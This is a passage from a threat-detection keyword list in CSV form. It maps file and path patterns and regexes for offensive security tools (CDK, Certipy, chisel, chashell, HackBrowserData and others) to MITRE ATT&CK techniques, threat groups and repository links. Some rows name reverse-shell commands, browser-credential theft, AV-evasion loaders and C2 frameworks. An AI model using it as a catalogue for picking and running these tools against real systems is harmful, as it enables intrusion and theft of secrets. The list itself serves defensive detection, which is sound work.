TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5966" "*/cdk_linux_386*",".{0,1000}\/cdk_linux_386.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5967" "*/cdk_linux_amd64*",".{0,1000}\/cdk_linux_amd64.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5968" "*/cdk-fabric run reverse-shell*",".{0,1000}\/cdk\-fabric\srun\sreverse\-shell.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5969" "*/cdk-fabric run shim-pwn*",".{0,1000}\/cdk\-fabric\srun\sshim\-pwn.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","5970" "*/CelestialSpark.git*",".{0,1000}\/CelestialSpark\.git.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging 
Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","5971" "*/cerbrutus*",".{0,1000}\/cerbrutus.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1110 - T1040 - T1496","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","N/A","4","385","57","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z","5972" "*/Certify.exe*",".{0,1000}\/Certify\.exe.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5973" "*/Certify.exe*",".{0,1000}\/Certify\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5974" 
"*/Certipy.exe*",".{0,1000}\/Certipy\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5975" "*/Certipy.git*",".{0,1000}\/Certipy\.git.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","5976" "*/Certipy/*",".{0,1000}\/Certipy\/.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","5977" "*/certipy64.exe*",".{0,1000}\/certipy64\.exe.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 
- T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","5978" "*/certs/dnsKIRE.local.crt*",".{0,1000}\/certs\/dnsKIRE\.local\.crt.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","5979" "*/certs/dnsKIRE.local.key*",".{0,1000}\/certs\/dnsKIRE\.local\.key.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","5980" "*/CertStealer*",".{0,1000}\/CertStealer.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1552.001 - T1140 - T1005 - T1649","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","10","5","487","68","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z","5981" "*/certsync.git*",".{0,1000}\/certsync\.git.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","5982" "*/cfn__resource_injection_lambda*",".{0,1000}\/cfn__resource_injection_lambda.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - 
TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5983" "*/ChaiLdr.exe*",".{0,1000}\/ChaiLdr\.exe.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","1","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","5984" "*/ChaiLdr.git*",".{0,1000}\/ChaiLdr\.git.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","1","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","5985" "*/ChainBuilder.py*",".{0,1000}\/ChainBuilder\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","5986" "*/Chakra.dll*",".{0,1000}\/Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","N/A","10","3","N/A","N/A","N/A","N/A","5987" "*/changepasswd.py*",".{0,1000}\/changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","#linux","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5988" "*/ChannelLinter.exe*",".{0,1000}\/ChannelLinter\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5989" "*/ChannelLinter_d64.exe*",".{0,1000}\/ChannelLinter_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5990" "*/CHAOS.git*",".{0,1000}\/CHAOS\.git.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","5991" "*/CHAOS-5.0.1.zip*",".{0,1000}\/CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","5992" "*/chaos-container:/database/*",".{0,1000}\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","5993" "*/charlotte.cpp*",".{0,1000}\/charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully 
undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","5994" "*/charlotte.py*",".{0,1000}\/charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","5995" "*/chashell.git*",".{0,1000}\/chashell\.git.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","5996" "*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5997" "*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","5998" "*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","5999" "*/checkRoot.ps1*",".{0,1000}\/checkRoot\.ps1.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#linux","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","6000" "*/CheckSMBSigning.git*",".{0,1000}\/CheckSMBSigning\.git.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","6001" "*/CheckSMBSigning.ps1*",".{0,1000}\/CheckSMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - 
TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","6002" "*/CheeseTools.git*",".{0,1000}\/CheeseTools\.git.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","6003" "*/cheetah.git*",".{0,1000}\/cheetah\.git.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","6004" "*/cheetah.py*",".{0,1000}\/cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","#linux","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","6005" "*/Chimera.git*",".{0,1000}\/Chimera\.git.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","6006" "*/chimera.py*",".{0,1000}\/chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","6007" "*/chimera.sh*",".{0,1000}\/chimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","6008" "*/chisel.exe*",".{0,1000}\/chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6009" "*/chisel.git*",".{0,1000}\/chisel\.git.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6010" "*/chisel/client/*",".{0,1000}\/chisel\/client\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6011" "*/chisel/server/*",".{0,1000}\/chisel\/server\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - 
Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6012" "*/chisel@latest*",".{0,1000}\/chisel\@latest.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6013" "*/chisel_x32*",".{0,1000}\/chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6014" "*/chisel_x64*",".{0,1000}\/chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6015" "*/chisel-darwin_amd64*",".{0,1000}\/chisel\-darwin_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6016" "*/chisel-freebsd*",".{0,1000}\/chisel\-freebsd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6017" "*/chisel-linux_*",".{0,1000}\/chisel\-linux_.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6018" "*/chisel-master*",".{0,1000}\/chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6019" "*/chisel-windows_amd6*",".{0,1000}\/chisel\-windows_amd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","6020" "*/chntpw -*",".{0,1000}\/chntpw\s\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential 
Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6021" "*/chntpw-140201*",".{0,1000}\/chntpw\-140201.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6022" "*/chrome_creditcard.csv*",".{0,1000}\/chrome_creditcard\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6023" "*/chrome_creditcard.json*",".{0,1000}\/chrome_creditcard\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6024" "*/chrome_decrypt.exe*",".{0,1000}\/chrome_decrypt\.exe.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","1","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","6025" "*/chrome_decrypt.py*",".{0,1000}\/chrome_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential 
Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","6026" "*/chrome_password.csv*",".{0,1000}\/chrome_password\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6027" "*/chrome_password.json*",".{0,1000}\/chrome_password\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","6028" "*/Chrome-App-Bound-Encryption-Decryption.git*",".{0,1000}\/Chrome\-App\-Bound\-Encryption\-Decryption\.git.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","1","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","6029" "*/ChromeDump.ahk*",".{0,1000}\/ChromeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 